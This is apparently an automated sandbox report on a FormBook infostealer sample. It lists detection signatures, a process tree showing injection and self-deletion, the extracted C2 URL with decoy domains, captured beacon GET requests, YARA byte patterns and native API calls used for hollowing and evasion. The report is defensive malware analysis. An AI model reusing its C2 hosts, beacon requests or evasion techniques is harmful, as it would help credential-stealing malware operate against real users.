
Analysis Report XhU4EXUp0x.exe

Overview

General Information

Sample Name: XhU4EXUp0x.exe
Analysis ID: 433531
MD5: 49c83eceb8a816b959a778e5f2e78801
SHA1: ead9055c813de47edfec5bc46a0d896df4b4af2e
SHA256: 2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XhU4EXUp0x.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: 49C83ECEB8A816B959A778E5F2E78801)
    • XhU4EXUp0x.exe (PID: 6076 cmdline: C:\Users\user\Desktop\XhU4EXUp0x.exe MD5: 49C83ECEB8A816B959A778E5F2E78801)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6340 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 3416 cmdline: /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.XhU4EXUp0x.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.XhU4EXUp0x.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.XhU4EXUp0x.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
3.0.XhU4EXUp0x.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.XhU4EXUp0x.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: XhU4EXUp0x.exe, Virustotal: Detection: 21%
Source: XhU4EXUp0x.exe, ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match, File source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: XhU4EXUp0x.exe, Joe Sandbox ML: detected
Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: XhU4EXUp0x.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: XhU4EXUp0x.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP, source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb, source: XhU4EXUp0x.exe
Source: Binary string: wntdll.pdbUGP, source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: XhU4EXUp0x.exe, raserver.exe
Source: Binary string: RAServer.pdb, source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
Source: Binary string: RAServer.pdbGCTL, source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb, source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.yellow-wink.com/nff/
Source: global traffic, HTTP traffic detected: GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1 Host: www.gentrypartyof8.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1 Host: www.rsyueda.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 66.235.200.146
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: LEASEWEB-USA-SEA-10US
Source: global traffic, HTTP traffic detected: GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1 Host: www.gentrypartyof8.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1 Host: www.rsyueda.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown, DNS traffic detected: queries for: www.gentrypartyof8.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419D50 NtCreateFile,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419E00 NtReadFile,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419E80 NtClose,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419F30 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419DA9 NtReadFile,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419E7A NtClose,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_00419F2D NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019999A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019998F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019995D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019997A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019996E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019999D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999950 NtQueueApcThread,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019998A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999820 NtEnumerateKey,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_0199B040 NtSuspendThread,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_0199A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999B00 NtSetValueKey,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999A10 NtQuerySection,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019995F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_0199AD30 NtSetContextThread,
